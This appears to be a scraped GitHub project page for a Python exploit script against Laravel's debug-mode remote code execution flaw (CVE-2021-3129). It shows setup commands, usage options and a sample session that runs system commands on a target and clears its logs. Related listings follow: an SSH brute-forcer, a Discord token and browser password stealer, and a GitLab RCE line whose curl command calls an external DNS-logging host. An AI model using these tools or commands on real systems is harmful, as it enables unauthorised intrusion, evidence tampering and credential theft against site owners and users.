Laravel RCE (CVE-2021-3129)

Related tags

Security related resourcesCVE-2021-3129
Overview

CVE-2021-3129 - Laravel RCE

About

The script has been made for exploiting the Laravel RCE (CVE-2021-3129) vulnerability.
This script allows you to write/execute commands on a website running Laravel <= v8.4.2, that has "APP_DEBUG" set to "true" in its ".env" file.

It currently has support for searching the log file, executing commands, writing to the log file, and support for clearing log files.

Setup

$ git clone https://github.com/joshuavanderpoll/CVE-2021-3129.git
$ cd CVE-2021-3129
# pip install -r requirements.txt
# python3 CVE-2021-3129.py --help

Options

usage: CVE-2021-3129.py [-h] [--host HOST] [--force] [--log LOG] [--ua]
                        [--chain CHAIN] [--chains]

Exploit CVE-2021-3129 - Laravel vulnerability exploit script

optional arguments:
  -h, --help     show this help message and exit
  --host HOST    Host URL to use exploit on
  --force        Force exploit without checking if vulnerable
  --log LOG      Full path to laravel.log file (e.g.
                 /var/www/html/storage/logs/laravel.log)
  --ua           Randomize User-Agent for requests
  --chain CHAIN  Select PHPGGC chain. Use "--chains" parameter to view all
                 available chains.
  --chains       View available chains for the "--chain" parameter

Example

$ python3 CVE-2021-3129.py --host http://127.0.0.1/public/
Laravel Debug Mode CVE script
[•] Made by: https://jvdpoll.nl
[@] Starting exploit on "http://127.0.0.1/public/"...
[@] Testing vulnerable URL http://127.0.0.1/public/_ignition/execute-solution...
[√] Host seems vulnerable!
[@] Searching Laravel log file path...
[•] Log path found: "/home/laravel/web/storage/logs/laravel.log"
[•] Laravel log found: "/home/laravel/web/storage/logs/laravel.log".
[•] Laravel version found: "7.22.4".
[√] Laravel log file set to "/home/laravel/web/storage/logs/laravel.log".
[•] Use "?" for a list of all possible actions.
[?] Please enter a command to execute: help
[•] Available commands:
    exit - Exit program.
    help - Shows available commands.
    clear_logs - Clears Laravel logs.
    execute <command> - Execute system command.
    write <command> - Write to log file.
[?] Please enter a command to execute: execute ls /home/laravel/web/
[@] Executing command "ls /home/laravel/web/"...
[@] Generating payload...
[√] Generated payload.
[@] Clearing logs...
[√] Cleared logs.
[@] Causing error in logs...
[√] Caused error in logs.
[@] Sending payload...
[√] Sent payload.
[@] Converting payload...
[√] Converted payload.
[√] Result:

README.md
app
artisan
bootstrap
composer.json
composer.lock
config
database
package.json
phpunit.xml
public
resources
routes
server.php
storage
tests
vendor
webpack.mix.js

[@] Clearing logs...
[√] Cleared logs.

Future:

  • Automatically determine PHPGCC chain if version detected while scanning.

Credits

Owner
Joshua van der Poll
Cyber enthousiast / Developer
Joshua van der Poll
GitHub Repository
A simple multi-threaded distributed SSH brute-forcing tool written in Python.

OrbitalDump A simple multi-threaded distributed SSH brute-forcing tool written in Python. How it Works When the script is executed without the --proxi

K4YT3X 408 Jan 03, 2023
Northwave Log4j CVE-2021-44228 checker

Northwave Log4j CVE-2021-44228 checker Friday 10 December 2021 a new Proof-of-Concept 1 addressing a Remote code Execution (RCE) vulnerability in the

Northwave 125 Dec 09, 2022
Safety checks your installed dependencies for known security vulnerabilities

Safety checks your installed dependencies for known security vulnerabilities. By default it uses the open Python vulnerability database Safety DB, but

pyup.io 1.4k Dec 30, 2022
♻️ Password Generator (PSG) 📚 This plugin is made for more familiarity with Python, but can also be used to create passwords

About Tool This plugin is made for more familiarity with Python, but can also be used to create passwords.

STgazing 2 Jul 23, 2022
Log4jake works by spidering a web application for GET/POST requests

Log4jake Log4jake works by spidering a web application for GET/POST requests. It will then automatically execute the GET/POST requests, filling any di

16 May 09, 2022
GitLab CI security tools runner

Common Security Pipeline Описание проекта: Данный проект является вариантом реализации DevSecOps практик, на базе: GitLab DefectDojo OpenSouce tools g

Сити-Мобил 14 Dec 23, 2022
A token logger for discord + steals Brave/Chrome passwords and usernames

Backdoor Machine - ❗ For educational purposes only ❗ A program made in python for stealing passwords and usernames from Google Chrome/Brave and tokenl

36 Jul 18, 2021
To explore creating an application that detects available connections at once from wifi and bluetooth

Signalum A Linux Package to detect and analyze existing connections from wifi and bluetooth. Also checkout the Desktop Application. Signalum Installat

BISOHNS 56 Mar 03, 2021
A script to search, scrape and scan for Apache Log4j CVE-2021-44228 affected files using Google dorks

Log4j dork scanner This is an auto script to search, scrape and scan for Apache Log4j CVE-2021-44228 affected files using Google dorks. Installation:

Jagar 5 Dec 27, 2022
recover Firefox and more browsers logins

Browser Creds this script will recover saved browsers logins into txt files. It currently only support windows 10. currently support : Chrome Opera Fi

HugoLB 41 Nov 09, 2022
PassLock is a medium-security password manager that encrypts passwords using Advanced Encryption Standards (AES)

A medium security python password manager that encrypt passwords using Advanced Encryption Standard (AES) PassLock is a password manager and password

Akshay Vs 44 Nov 18, 2022
CVE-2021-22205 Unauthorized RCE

CVE-2021-22205 影响版本: Gitlab CE/EE 13.10.3 Gitlab CE/EE 13.9.6 Gitlab CE/EE 13.8.8 Usage python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog

r0eXpeR 70 Nov 09, 2022
Docker is an open platform for developing, shipping, and running applications OS-level virtualization to deliver software in packages called containers However, 'security' is a top request on Docker's public roadmap This project aims at vulnerability check for such docker containers. New contributions are accepted

Docker-Vulnerability-Check Docker is an open platform for developing, shipping, and running applications OS-level virtualization to deliver software i

Team Spark 103 Aug 20, 2022
Operational information regarding the vulnerability in the Log4j logging library.

Log4j Vulnerability (CVE-2021-44228) This repo contains operational information regarding the vulnerability in the Log4j logging library (CVE-2021-442

Nationaal Cyber Security Centrum (NCSC-NL) 1.9k Dec 26, 2022
Internationalized Domain Names for Python (IDNA 2008 and UTS #46)

Internationalized Domain Names in Applications (IDNA) Support for the Internationalised Domain Names in Applications (IDNA) protocol as specified in R

Kim Davies 204 Dec 13, 2022
Exploit and Check Script for CVE 2022-1388

F5-CVE-2022-1388-Exploit Exploit and Check Script for CVE 2022-1388 Usage Check against single host python3 CVE-2022-1388.py -v true -u target_url At

Andy Gill 52 Dec 22, 2022
Password-Manager - This app can generate ,save , find and delete passwords.

Password-Manager This app can generate ,save , find and delete passwords. In the StartUp() Function , there are three buttons to choose from : Generat

1 Jan 01, 2022
test application for the licence key web app.

licence_software_test_app Make sure you set your database values in a .env file to the folder. Install MYSQL connector: pip install mysql-connector-py

Carl Beattie 1 Oct 28, 2021
Searches for potentially vulnerable websites to local file inclusion, throughout the web and then exploits them for LFI

LFI-Hunter Searches for potentially vulnerable websites to local file inclusion, throughout the web and then exploits them for LFI A script written in

Anukul Pandey 6 Jan 30, 2022
log4j2 dos exploit,CVE-2021-45105 exploit,Denial of Service poc

说明 about author: 我超怕的 blog: https://www.cnblogs.com/iAmSoScArEd/ github: https://github.com/iAmSOScArEd/ date: 2021-12-20 log4j2 dos exploit log4j2 do

3 Aug 13, 2022